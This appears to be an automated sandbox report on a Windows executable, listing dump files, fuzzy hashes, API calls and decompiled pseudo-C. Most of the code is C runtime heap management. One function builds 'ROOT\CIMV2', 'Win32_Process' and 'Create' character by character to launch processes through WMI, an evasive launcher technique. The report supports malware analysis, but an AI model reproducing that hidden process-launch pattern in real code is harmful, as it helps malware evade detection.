Associated: 00000000.00000002.202870545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202881099.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202885099.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202889113.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202893852.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocCreateDestroyVersion
String ID:
API String ID: 2507506473-0
Opcode ID: 459ff63f0a519e06ba7e0233f00400d57d4cc8d3df7f9ce67a017d6a64b97de1
Instruction ID: 47af9f060beaa7301e025e86c209b90f00c6c47a25b31e9803f9e5dba2807468
Opcode Fuzzy Hash: 459ff63f0a519e06ba7e0233f00400d57d4cc8d3df7f9ce67a017d6a64b97de1
Instruction Fuzzy Hash: C5F06571D44302A9EB206FB1DE057363ED99784757F10493BF900F81E0EB788688955E

Uniqueness

Uniqueness Score: -1.00%

Function 004028DE, Relevance: 1.6, APIs: 1, Instructions: 80
memoryCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E004028DE(unsigned int _a4) {
				signed int _v8;
				intOrPtr _v20;
				void* _v32;
				intOrPtr _t19;
				void* _t20;
				signed char _t22;
				void* _t23;
				void* _t24;
				void* _t36;
				unsigned int _t44;
				unsigned int _t46;
				intOrPtr _t47;
				void* _t50;

				_push(0xffffffff);
				_push(0x408178);
				_push(E00403E38);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t47;
				_t19 =  *0x40d528; // 0x1
				if(_t19 != 3) {
					__eflags = _t19 - 2;
					if(_t19 != 2) {
						goto L11;
					} else {
						_t24 = _a4;
						__eflags = _t24;
						if(_t24 == 0) {
							_t44 = 0x10;
						} else {
							_t9 = _t24 + 0xf; // 0xf
							_t44 = _t9 & 0xfffffff0;
						}
						_a4 = _t44;
						__eflags = _t44 -  *0x40c26c; // 0x1e0
						if(__eflags > 0) {
							L10:
							_push(_t44);
							goto L14;
						} else {
							E004052D9(9);
							_pop(_t36);
							_v8 = 1;
							_v32 = E00404EDB(_t36, _t44 >> 4);
							_v8 = _v8 | 0xffffffff;
							E004029A4();
							_t23 = _v32;
							__eflags = _t23;
							if(_t23 == 0) {
								goto L10;
							}
						}
					}
				} else {
					_t46 = _a4;
					_t50 = _t46 -  *0x40d520; // 0x0
					if(_t50 > 0) {
						L11:
						_t20 = _a4;
						__eflags = _t20;
						if(_t20 == 0) {
							_t20 = 1;
						}
						_t22 = _t20 + 0x0000000f & 0x000000f0;
						__eflags = _t22;
						_push(_t22);
						L14:
						_push(0);
						_t23 = RtlAllocateHeap( *0x40d524); // executed
					} else {
						E004052D9(9);
						_v8 = _v8 & 0x00000000;
						_push(_t46);
						_v32 = E00404438();
						_v8 = _v8 | 0xffffffff;
						E00402945();
						_t23 = _v32;
						if(_t23 == 0) {
							goto L11;
						} else {
						}
					}
				}
				 *[fs:0x0] = _v20;
				return _t23;
			}

0x004028e1
0x004028e3
0x004028e8
0x004028f3
0x004028f4
0x00402901
0x00402909
0x0040294e
0x00402951
0x00000000
0x00402953
0x00402953
0x00402956
0x00402958
0x00402964
0x0040295a
0x0040295a
0x0040295d
0x0040295d
0x00402965
0x00402968
0x0040296e
0x0040299e
0x0040299e
0x00000000
0x00402970
0x00402972
0x00402977
0x00402978
0x0040298b
0x0040298e
0x00402992
0x00402997
0x0040299a
0x0040299c
0x00000000
0x00000000
0x0040299c
0x0040296e
0x0040290b
0x0040290b
0x0040290e
0x00402914
0x004029ad
0x004029ad
0x004029b0
0x004029b2
0x004029b6
0x004029b6
0x004029ba
0x004029ba
0x004029bc
0x004029bd
0x004029bd
0x004029c5
0x0040291a
0x0040291c
0x00402922
0x00402926
0x0040292d
0x00402930
0x00402934
0x00402939
0x0040293e
0x00000000
0x00000000
0x00402940
0x0040293e
0x00402914
0x004029ce
0x004029d9

APIs

RtlAllocateHeap.NTDLL(00000000,-0000000F,00000000,?,00000000,00000000,00000000), ref: 004029C5

Part of subcall function 004052D9: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0040589B,00000009,00000000,00000000,00000001,004032D8,00000001,00000074,?,?,00000000,00000001), ref: 00405316
Part of subcall function 004052D9: EnterCriticalSection.KERNEL32(?,?,?,0040589B,00000009,00000000,00000000,00000001,004032D8,00000001,00000074,?,?,00000000,00000001), ref: 00405331

Memory Dump Source

Source File: 00000000.00000002.202874069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202870545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202881099.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202885099.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202889113.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202893852.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$AllocateEnterHeapInitialize
String ID:
API String ID: 1616793339-0
Opcode ID: 61ade5727045bfb51fc66964740475549272ea74928c6571b4fa07b5045e52eb
Instruction ID: b3198372e80d242cf06e58d27ba1c6f341acb17ecb1f1b3acd74d190493146d8
Opcode Fuzzy Hash: 61ade5727045bfb51fc66964740475549272ea74928c6571b4fa07b5045e52eb
Instruction Fuzzy Hash: 5221CC72B00204ABDB10DF65DE46B9E77A4EB01724F20413BF450F72C0C7BC99418AAD

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00401050, Relevance: 82.7, APIs: 22, Strings: 25, Instructions: 457
memorystringcomCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E00401050() {
				char _v40;
				intOrPtr _v48;
				signed int _v60;
				char _v96;
				char _v136;
				intOrPtr _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				char _v176;
				WCHAR* _v184;
				char _v196;
				char _v200;
				intOrPtr _v212;
				char _v220;
				intOrPtr _v228;
				char _v240;
				char _v248;
				intOrPtr _v252;
				intOrPtr* _v256;
				void* _v260;
				char _v264;
				intOrPtr _v272;
				char _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				char _v292;
				intOrPtr _v296;
				intOrPtr* _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				intOrPtr _v332;
				intOrPtr* _v336;
				char _v340;
				char _v360;
				char _v364;
				char _v368;
				intOrPtr* _v388;
				char _v396;
				char _v404;
				signed int _v408;
				signed int _v412;
				char _v420;
				intOrPtr* _v424;
				intOrPtr* _v432;
				char _v440;
				void* _v444;
				intOrPtr* _v452;
				intOrPtr* _v460;
				intOrPtr* _v464;
				intOrPtr* _v468;
				intOrPtr* _v472;
				intOrPtr* _v480;
				intOrPtr* _v492;
				intOrPtr* _v496;
				intOrPtr _t172;
				char* _t174;
				intOrPtr* _t175;
				intOrPtr _t177;
				intOrPtr* _t178;
				intOrPtr _t179;
				void* _t180;
				intOrPtr* _t182;
				intOrPtr* _t186;
				intOrPtr* _t188;
				intOrPtr* _t190;
				intOrPtr* _t195;
				intOrPtr* _t197;
				intOrPtr* _t199;
				intOrPtr* _t204;
				intOrPtr* _t205;
				intOrPtr* _t206;
				intOrPtr* _t207;
				intOrPtr* _t208;
				intOrPtr _t215;
				intOrPtr* _t216;
				intOrPtr* _t220;
				intOrPtr* _t226;
				intOrPtr* _t227;
				intOrPtr* _t228;
				intOrPtr* _t229;
				intOrPtr* _t238;
				intOrPtr* _t244;
				intOrPtr* _t245;
				intOrPtr* _t246;
				intOrPtr* _t247;
				intOrPtr* _t248;
				void* _t263;
				intOrPtr* _t268;
				signed int _t320;
				signed int _t321;
				intOrPtr _t323;
				void* _t324;
				intOrPtr* _t328;
				WCHAR* _t329;
				intOrPtr* _t331;
				intOrPtr* _t332;
				intOrPtr* _t333;
				intOrPtr* _t334;
				intOrPtr* _t335;
				intOrPtr* _t336;
				void* _t337;
				intOrPtr _t339;
				intOrPtr _t340;
				void* _t341;

				_t172 =  *[fs:0x0];
				 *[fs:0x0] = _t340;
				_t341 = _t340 - 0xc4;
				_t321 = _t320 | 0xffffffff;
				_v176 = 0;
				__imp__CoInitializeSecurity(0, _t321, 0, 0, 0, 3, 0, 0, 0, _t320, _t324, _t337, _t263, _t172, E00407B55, 0xffffffff);
				if(_t172 < 0) {
					L68:
					 *[fs:0x0] = _v48;
					return _v212;
				}
				_v240 = 0;
				_t174 =  &_v240;
				_v40 = 0;
				__imp__CoCreateInstance(0x408850, 0, 1, 0x40a044, _t174);
				if(_t174 < 0) {
					L42:
					_v60 = _t321;
					goto L66;
				} else {
					_v264 = 0;
					_v60 = 1;
					_v176 = 0x4f0052;
					_v172 = 0x54004f;
					_v168 = 0x43005c;
					_v164 = 0x4d0049;
					_v160 = 0x320056;
					_v156 = 0;
					_t177 = E0040225B(0xc);
					_t341 = _t341 + 4;
					_v228 = _t177;
					_v60 = 2;
					if(_t177 == 0) {
						_t178 = 0;
					} else {
						_t178 = E00401810(_t177, _t177,  &_v176);
					}
					_v60 = 1;
					_v256 = _t178;
					if(_t178 == 0) {
						E00407633(0x8007000e);
						_t178 = _v260;
					}
					_v60 = 3;
					if(_t178 == 0) {
						_t179 = 0;
					} else {
						_t179 =  *_t178;
					}
					_t268 = _v260;
					_t180 =  *((intOrPtr*)( *_t268 + 0xc))(_t268, _t179, 0, 0, 0, 0, 0, 0,  &_v264);
					E004017C0( &_v292);
					_t182 = _v300;
					if(_t180 < 0) {
						L40:
						_v96 = 0;
						if(_t182 != 0) {
							 *((intOrPtr*)( *_t182 + 8))(_t182);
						}
						goto L42;
					} else {
						__imp__CoSetProxyBlanket(_t182, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t182 < 0) {
							_t182 = _v332;
							goto L40;
						}
						_v304 = 0;
						_v308 = 0;
						_v316 = 0;
						_t328 = __imp__#2;
						_v260 = 0x720043;
						_v256 = 0x610065;
						_v252 = 0x650074;
						_v248 = 0;
						_v172 = 0x690057;
						_v168 = 0x33006e;
						_v164 = 0x5f0032;
						_v160 = 0x720050;
						_v156 = 0x63006f;
						_v152 = 0x730065;
						_v148 = 0x73;
						_t323 =  *_t328( &_v260);
						_v300 = _t323;
						_t339 =  *_t328( &_v176);
						_v152 = _t339;
						_t186 = _v340;
						_v136 = 8;
						 *((intOrPtr*)( *_t186 + 0x18))(_t186, _t339, 0, 0,  &_v312, 0);
						_t188 = _v336;
						 *((intOrPtr*)( *_t188 + 0x4c))(_t188, _t323, 0,  &_v340, 0);
						_t190 = _v360;
						 *((intOrPtr*)( *_t190 + 0x3c))(_t190, 0,  &_v368);
						_v388 =  *_t328(_v184);
						_t329 = _v184;
						_v196 = 9;
						if(_t329 != 0) {
							_push(lstrlenW(0x40a040));
							E004016C0(0x40a040);
							_push(lstrlenW(_t329));
							_t193 = E004016C0(_t329);
						}
						_v360 = 0;
						E00401770(_t193,  &_v360, _v388);
						_t195 = _v388;
						_v292 = 0x6f0043;
						_v288 = 0x6d006d;
						_v284 = 0x6e0061;
						_v280 = 0x4c0064;
						_v276 = 0x6e0069;
						_v272 = 0x65;
						_v200 = 0xa;
						 *((intOrPtr*)( *_t195 + 0x14))(_t195,  &_v292, 0,  &_v364, 0);
						_v404 = 0;
						_t197 = _v424;
						_push(0);
						_push( &_v404);
						_push(_v408);
						_push(0);
						_push(0);
						_push(_t323);
						_push(_t339);
						_push(_t197);
						_v220 = 0xb;
						if( *((intOrPtr*)( *_t197 + 0x60))() < 0) {
							_t199 = _v432;
							_v248 = 0xa;
							if(_t199 != 0) {
								 *((intOrPtr*)( *_t199 + 8))(_t199);
							}
							__imp__#9( &_v412);
							_t331 = __imp__#6;
							 *_t331(_v444);
							 *_t331(_t339);
							 *_t331(_t323);
							_t204 = _v452;
							_v264 = 5;
							if(_t204 != 0) {
								 *((intOrPtr*)( *_t204 + 8))(_t204);
							}
							_t205 = _v444;
							_v264 = 4;
							if(_t205 != 0) {
								 *((intOrPtr*)( *_t205 + 8))(_t205);
							}
							_t206 = _v440;
							_v264 = 1;
							if(_t206 != 0) {
								 *((intOrPtr*)( *_t206 + 8))(_t206);
							}
							_t207 = _v468;
							_v264 = 0;
							if(_t207 != 0) {
								 *((intOrPtr*)( *_t207 + 8))(_t207);
							}
							_t208 = _v464;
							_v264 = 0xffffffff;
							if(_t208 != 0) {
								 *((intOrPtr*)( *_t208 + 8))(_t208);
							}
							goto L68;
						}
						_v396 = 0;
						_v248 = 0xc;
						_v316 = 0x650052;
						_v312 = 0x750074;
						_v308 = 0x6e0072;
						_v304 = 0x610056;
						_v300 = 0x75006c;
						_v296 = 0x65;
						_t215 = E0040225B(0xc);
						_t341 = _t341 + 4;
						_v444 = _t215;
						_v248 = 0xd;
						if(_t215 == 0) {
							_t332 = 0;
						} else {
							_t332 = E00401810(_t215, _t215,  &_v316);
						}
						_v248 = 0xc;
						_v260 = _t332;
						if(_t332 == 0) {
							E00407633(0x8007000e);
						}
						_v248 = 0xe;
						if(_t332 == 0) {
							_v444 = 0;
						} else {
							_v444 =  *_t332;
						}
						_t216 = _v432;
						_v468 =  *((intOrPtr*)( *_t216 + 0x10))(_t216, _v444, 0,  &_v396, 0, 0);
						if(_t332 != 0) {
							E00401850(_t332);
						}
						if(_v468 < 0 || (_v412 | _v408) != 0) {
							_t333 = __imp__#9;
							 *_t333( &_v420);
							_t220 = _v460;
							_v276 = 0xa;
							if(_t220 != 0) {
								 *((intOrPtr*)( *_t220 + 8))(_t220);
							}
							 *_t333( &_v440);
							_t334 = __imp__#6;
							 *_t334(_v472);
							 *_t334(_t339);
							 *_t334(_t323);
							_t226 = _v480;
							_v292 = 5;
							if(_t226 != 0) {
								 *((intOrPtr*)( *_t226 + 8))(_t226);
							}
							_t227 = _v472;
							_v292 = 4;
							if(_t227 != 0) {
								 *((intOrPtr*)( *_t227 + 8))(_t227);
							}
							_t228 = _v468;
							_v292 = 1;
							if(_t228 != 0) {
								 *((intOrPtr*)( *_t228 + 8))(_t228);
							}
							_t229 = _v496;
							_v292 = 0;
							if(_t229 != 0) {
								 *((intOrPtr*)( *_t229 + 8))(_t229);
							}
							_v292 = 0xffffffff;
							L66:
							_t175 = _v260;
							if(_t175 != 0) {
								 *((intOrPtr*)( *_t175 + 8))(_t175);
							}
						} else {
							_t335 = __imp__#9;
							_v444 = 1;
							 *_t335( &_v420);
							_t238 = _v460;
							_v276 = 0xa;
							if(_t238 != 0) {
								 *((intOrPtr*)( *_t238 + 8))(_t238);
							}
							 *_t335( &_v440);
							_t336 = __imp__#6;
							 *_t336(_v472);
							 *_t336(_t339);
							 *_t336(_t323);
							_t244 = _v480;
							_v292 = 5;
							if(_t244 != 0) {
								 *((intOrPtr*)( *_t244 + 8))(_t244);
							}
							_t245 = _v472;
							_v292 = 4;
							if(_t245 != 0) {
								 *((intOrPtr*)( *_t245 + 8))(_t245);
							}
							_t246 = _v468;
							_v292 = 1;
							if(_t246 != 0) {
								 *((intOrPtr*)( *_t246 + 8))(_t246);
							}
							_t247 = _v496;
							_v292 = 0;
							if(_t247 != 0) {
								 *((intOrPtr*)( *_t247 + 8))(_t247);
							}
							_t248 = _v492;
							_v292 = 0xffffffff;
							if(_t248 != 0) {
								 *((intOrPtr*)( *_t248 + 8))(_t248);
							}
						}
						goto L68;
					}
				}
			}

0x00401057
0x0040105e
0x00401065
0x00401078
0x0040107e
0x00401082
0x0040108a
0x00401687
0x00401696
0x004016a3
0x004016a3
0x00401090
0x00401094
0x00401098
0x004010ad
0x004010b5
0x00401521
0x00401521
0x00000000
0x004010bb
0x004010bb
0x004010c1
0x004010c9
0x004010d1
0x004010d9
0x004010e1
0x004010e9
0x004010f1
0x004010f8
0x004010fd
0x00401100
0x00401106
0x0040110e
0x0040111e
0x00401110
0x00401117
0x00401117
0x00401122
0x0040112a
0x0040112e
0x00401135
0x0040113a
0x0040113a
0x00401140
0x00401148
0x0040114e
0x0040114a
0x0040114a
0x0040114a
0x00401150
0x00401163
0x0040116c
0x00401171
0x00401177
0x00401510
0x00401512
0x00401519
0x0040151e
0x0040151e
0x00000000
0x0040117d
0x00401188
0x00401190
0x0040150c
0x00000000
0x0040150c
0x00401196
0x0040119a
0x0040119e
0x004011a2
0x004011ad
0x004011b5
0x004011bd
0x004011c5
0x004011c9
0x004011d4
0x004011df
0x004011ea
0x004011f5
0x00401200
0x0040120b
0x00401218
0x0040121a
0x00401228
0x0040122a
0x00401231
0x00401241
0x00401249
0x0040124c
0x0040125b
0x0040125e
0x0040126b
0x00401278
0x0040127c
0x00401283
0x0040128d
0x0040129a
0x004012a4
0x004012b0
0x004012b6
0x004012b6
0x004012bf
0x004012c9
0x004012ce
0x004012e4
0x004012ef
0x004012fa
0x00401305
0x00401310
0x0040131b
0x00401327
0x0040132f
0x00401332
0x00401336
0x0040133e
0x0040133f
0x00401346
0x00401347
0x00401348
0x00401349
0x0040134a
0x0040134b
0x0040134c
0x00401359
0x0040152d
0x00401531
0x0040153b
0x00401540
0x00401540
0x00401548
0x00401552
0x00401559
0x0040155c
0x0040155f
0x00401561
0x00401565
0x0040156f
0x00401574
0x00401574
0x00401577
0x0040157b
0x00401585
0x0040158a
0x0040158a
0x0040158d
0x00401591
0x0040159b
0x004015a0
0x004015a0
0x004015a3
0x004015a7
0x004015b0
0x004015b5
0x004015b5
0x004015b8
0x004015bc
0x004015c9
0x004015d2
0x004015d2
0x00000000
0x004015c9
0x0040135f
0x00401366
0x0040136e
0x00401379
0x00401384
0x0040138f
0x0040139a
0x004013a5
0x004013ac
0x004013b1
0x004013b4
0x004013ba
0x004013c2
0x004013d7
0x004013c4
0x004013d3
0x004013d3
0x004013db
0x004013e3
0x004013ea
0x004013f1
0x004013f1
0x004013f8
0x00401400
0x0040140a
0x00401402
0x00401404
0x00401404
0x0040140e
0x00401427
0x0040142b
0x0040142f
0x0040142f
0x00401438
0x004015da
0x004015e5
0x004015e7
0x004015eb
0x004015f5
0x004015fa
0x004015fa
0x00401602
0x00401608
0x0040160f
0x00401612
0x00401615
0x00401617
0x0040161b
0x00401625
0x0040162a
0x0040162a
0x0040162d
0x00401631
0x0040163b
0x00401640
0x00401640
0x00401643
0x00401647
0x00401651
0x00401656
0x00401656
0x00401659
0x0040165d
0x00401666
0x0040166b
0x0040166b
0x0040166e
0x00401679
0x00401679
0x0040167f
0x00401684
0x00401684
0x0040144e
0x0040144e
0x00401459
0x00401461
0x00401463
0x00401467
0x00401471
0x00401476
0x00401476
0x0040147e
0x00401484
0x0040148b
0x0040148e
0x00401491
0x00401493
0x00401497
0x004014a1
0x004014a6
0x004014a6
0x004014a9
0x004014ad
0x004014b7
0x004014bc
0x004014bc
0x004014bf
0x004014c3
0x004014cd
0x004014d2
0x004014d2
0x004014d5
0x004014d9
0x004014e2
0x004014e7
0x004014e7
0x004014ea
0x004014ee
0x004014fb
0x00401504
0x00401504
0x004014fb
0x00000000
0x00401438
0x00401177

APIs

CoInitializeSecurity.OLE32(00000000,00610064,00000000,00000000,00000000,00000003,00000000,00000000,00000000,00610064,74B482B0,002F0074,00000000), ref: 00401082
CoCreateInstance.OLE32(00408850,00000000,00000001,0040A044,?), ref: 004010AD
CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00401188
SysAllocString.OLEAUT32(?), ref: 00401216
SysAllocString.OLEAUT32(?), ref: 00401226
lstrlenW.KERNEL32(0040A040), ref: 00401294

Part of subcall function 004016C0: SysAllocStringLen.OLEAUT32(00000000,?), ref: 004016E7

lstrlenW.KERNEL32(?,0040A040,00000000), ref: 004012AA

Part of subcall function 004016C0: SysStringLen.OLEAUT32(00000000), ref: 004016D2
Part of subcall function 004016C0: SysFreeString.OLEAUT32(?), ref: 00401741

SysAllocString.OLEAUT32(?), ref: 00401276

Part of subcall function 00401810: SysAllocString.OLEAUT32(?), ref: 00401827

VariantClear.OLEAUT32(?), ref: 00401461
VariantClear.OLEAUT32(?), ref: 0040147E
SysFreeString.OLEAUT32(?), ref: 0040148B
SysFreeString.OLEAUT32(00000000), ref: 0040148E
SysFreeString.OLEAUT32(00000000), ref: 00401491
VariantClear.OLEAUT32(?), ref: 00401548
SysFreeString.OLEAUT32(?), ref: 00401559
SysFreeString.OLEAUT32(00000000), ref: 0040155C
SysFreeString.OLEAUT32(00000000), ref: 0040155F
VariantClear.OLEAUT32(?), ref: 004015E5
VariantClear.OLEAUT32(?), ref: 00401602
SysFreeString.OLEAUT32(?), ref: 0040160F
SysFreeString.OLEAUT32(00000000), ref: 00401612
SysFreeString.OLEAUT32(00000000), ref: 00401615

Strings

t, xrefs: 00401379
m, xrefs: 004012EF
R, xrefs: 004010C9
s, xrefs: 0040120B
r, xrefs: 00401384
e, xrefs: 00401200
l, xrefs: 0040139A
V, xrefs: 0040138F
C, xrefs: 004012E4
C, xrefs: 004011AD
V, xrefs: 004010E9
n, xrefs: 004011D4
\, xrefs: 004010D9
R, xrefs: 0040136E
i, xrefs: 00401310
o, xrefs: 004011F5
O, xrefs: 004010D1
a, xrefs: 004012FA
e, xrefs: 004011B5
t, xrefs: 004011BD
P, xrefs: 004011EA
I, xrefs: 004010E1
2, xrefs: 004011DF
W, xrefs: 004011C9
d, xrefs: 00401305

Memory Dump Source

Source File: 00000000.00000002.202874069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202870545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202881099.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202885099.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202889113.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202893852.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$AllocClearVariant$lstrlen$BlanketCreateInitializeInstanceProxySecurity
String ID: 2$C$C$I$O$P$R$R$V$V$W$\$a$d$e$e$i$l$m$n$o$r$s$t$t
API String ID: 1217749482-3083329441
Opcode ID: f6c38d306354a0b32987e32ac5e52a42e760a99a2cf686b41c5da790ca8eb103
Instruction ID: 10021222e56d23b629cf2bc6b0615b58b4580843e3adea8eb922f56a67540d35
Opcode Fuzzy Hash: f6c38d306354a0b32987e32ac5e52a42e760a99a2cf686b41c5da790ca8eb103
Instruction Fuzzy Hash: E1024D70508381DFD720CF65C888B5BBBE8BF89308F14496EF589AB291C7799845CF66

Uniqueness

Uniqueness Score: -1.00%

Function 004048ED, Relevance: .3, Instructions: 259
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E004048ED(signed int* _a4, intOrPtr* _a8, char _a11, signed int _a12, char _a15) {
				signed int _v8;
				signed char _v12;
				intOrPtr _v16;
				intOrPtr _t186;
				void* _t187;
				signed int _t188;
				signed int* _t189;
				intOrPtr _t191;
				signed int* _t192;
				signed int* _t193;
				signed char _t194;
				intOrPtr _t195;
				intOrPtr* _t196;
				signed int _t199;
				signed int _t202;
				signed int _t207;
				signed int _t209;
				signed int _t218;
				signed int _t221;
				signed int* _t222;
				signed int _t227;
				intOrPtr _t228;
				intOrPtr _t229;
				intOrPtr _t230;
				char _t233;
				signed int _t234;
				signed char _t235;
				signed int* _t237;
				signed int* _t239;
				signed int* _t244;
				signed int* _t245;
				signed char _t250;
				intOrPtr _t256;
				signed int _t257;
				char _t258;
				char _t259;
				signed char _t260;
				signed int* _t262;
				signed int* _t267;
				signed int* _t268;
				char* _t270;
				signed int _t274;
				unsigned int _t275;
				intOrPtr _t277;
				unsigned int _t278;
				intOrPtr* _t280;
				void* _t281;
				signed char _t290;
				signed int _t292;
				signed char _t295;
				signed int _t298;
				signed int _t302;
				signed int* _t304;

				_t222 = _a4;
				_t280 = _a8;
				_t186 =  *((intOrPtr*)(_t222 + 0x10));
				_t292 = _a12 + 0x00000017 & 0xfffffff0;
				_t274 = _t280 -  *((intOrPtr*)(_t222 + 0xc)) >> 0xf;
				_v16 = _t274 * 0x204 + _t186 + 0x144;
				_t227 =  *((intOrPtr*)(_t280 - 4)) - 1;
				_a12 = _t227;
				_t194 =  *(_t227 + _t280 - 4);
				_t281 = _t227 + _t280 - 4;
				_v8 = _t194;
				if(_t292 <= _t227) {
					if(__eflags < 0) {
						_t195 = _a8;
						_a12 = _a12 - _t292;
						_t228 = _t292 + 1;
						 *((intOrPtr*)(_t195 - 4)) = _t228;
						_t196 = _t195 + _t292 - 4;
						_a8 = _t196;
						_t295 = (_a12 >> 4) - 1;
						 *((intOrPtr*)(_t196 - 4)) = _t228;
						__eflags = _t295 - 0x3f;
						if(_t295 > 0x3f) {
							_t295 = 0x3f;
						}
						__eflags = _v8 & 0x00000001;
						if((_v8 & 0x00000001) == 0) {
							_t298 = (_v8 >> 4) - 1;
							__eflags = _t298 - 0x3f;
							if(_t298 > 0x3f) {
								_t298 = 0x3f;
							}
							__eflags =  *((intOrPtr*)(_t281 + 4)) -  *((intOrPtr*)(_t281 + 8));
							if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
								__eflags = _t298 - 0x20;
								if(_t298 >= 0x20) {
									_t128 = _t298 - 0x20; // -32
									_t130 = _t186 + 4; // 0x4
									_t244 = _t298 + _t130;
									_t199 =  !(0x80000000 >> _t128);
									 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
									 *_t244 =  *_t244 - 1;
									__eflags =  *_t244;
									if( *_t244 == 0) {
										_t245 = _a4;
										_t138 = _t245 + 4;
										 *_t138 =  *(_t245 + 4) & _t199;
										__eflags =  *_t138;
									}
								} else {
									_t304 = _t298 + _t186 + 4;
									_t202 =  !(0x80000000 >> _t298);
									 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
									 *_t304 =  *_t304 - 1;
									__eflags =  *_t304;
									if( *_t304 == 0) {
										 *_a4 =  *_a4 & _t202;
									}
								}
								_t196 = _a8;
							}
							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
							_t302 = _a12 + _v8;
							_a12 = _t302;
							_t295 = (_t302 >> 4) - 1;
							__eflags = _t295 - 0x3f;
							if(_t295 > 0x3f) {
								_t295 = 0x3f;
							}
						}
						_t229 = _v16;
						_t230 = _t229 + _t295 * 8;
						 *((intOrPtr*)(_t196 + 4)) =  *((intOrPtr*)(_t229 + 4 + _t295 * 8));
						 *((intOrPtr*)(_t196 + 8)) = _t230;
						 *((intOrPtr*)(_t230 + 4)) = _t196;
						 *((intOrPtr*)( *((intOrPtr*)(_t196 + 4)) + 8)) = _t196;
						__eflags =  *((intOrPtr*)(_t196 + 4)) -  *((intOrPtr*)(_t196 + 8));
						if( *((intOrPtr*)(_t196 + 4)) ==  *((intOrPtr*)(_t196 + 8))) {
							_t233 =  *(_t295 + _t186 + 4);
							__eflags = _t295 - 0x20;
							_a11 = _t233;
							_t234 = _t233 + 1;
							__eflags = _t234;
							 *(_t295 + _t186 + 4) = _t234;
							if(_t234 >= 0) {
								__eflags = _a11;
								if(_a11 == 0) {
									_t237 = _a4;
									_t176 = _t237 + 4;
									 *_t176 =  *(_t237 + 4) | 0x80000000 >> _t295 - 0x00000020;
									__eflags =  *_t176;
								}
								_t189 = _t186 + 0xc4 + _t274 * 4;
								_t235 = _t295 - 0x20;
								_t275 = 0x80000000;
							} else {
								__eflags = _a11;
								if(_a11 == 0) {
									_t239 = _a4;
									 *_t239 =  *_t239 | 0x80000000 >> _t295;
									__eflags =  *_t239;
								}
								_t189 = _t186 + 0x44 + _t274 * 4;
								_t275 = 0x80000000;
								_t235 = _t295;
							}
							 *_t189 =  *_t189 | _t275 >> _t235;
							__eflags =  *_t189;
						}
						_t188 = _a12;
						 *_t196 = _t188;
						 *((intOrPtr*)(_t188 + _t196 - 4)) = _t188;
					}
					L52:
					_t187 = 1;
					return _t187;
				}
				if((_t194 & 0x00000001) != 0 || _t292 > _t194 + _t227) {
					return 0;
				} else {
					_t250 = (_v8 >> 4) - 1;
					_v12 = _t250;
					if(_t250 > 0x3f) {
						_t250 = 0x3f;
						_v12 = _t250;
					}
					if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
						if(_t250 >= 0x20) {
							_t267 = _v12 + _t186 + 4;
							_t218 =  !(0x80000000 >> _t250 + 0xffffffe0);
							 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
							 *_t267 =  *_t267 - 1;
							__eflags =  *_t267;
							if( *_t267 == 0) {
								_t268 = _a4;
								_t44 = _t268 + 4;
								 *_t44 =  *(_t268 + 4) & _t218;
								__eflags =  *_t44;
							}
						} else {
							_t270 = _v12 + _t186 + 4;
							_t221 =  !(0x80000000 >> _t250);
							 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
							 *_t270 =  *_t270 - 1;
							if( *_t270 == 0) {
								 *_a4 =  *_a4 & _t221;
							}
						}
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
					_v8 = _v8 + _a12 - _t292;
					if(_v8 <= 0) {
						_t277 = _a8;
					} else {
						_t290 = (_v8 >> 4) - 1;
						_t256 = _a8 + _t292 - 4;
						if(_t290 > 0x3f) {
							_t290 = 0x3f;
						}
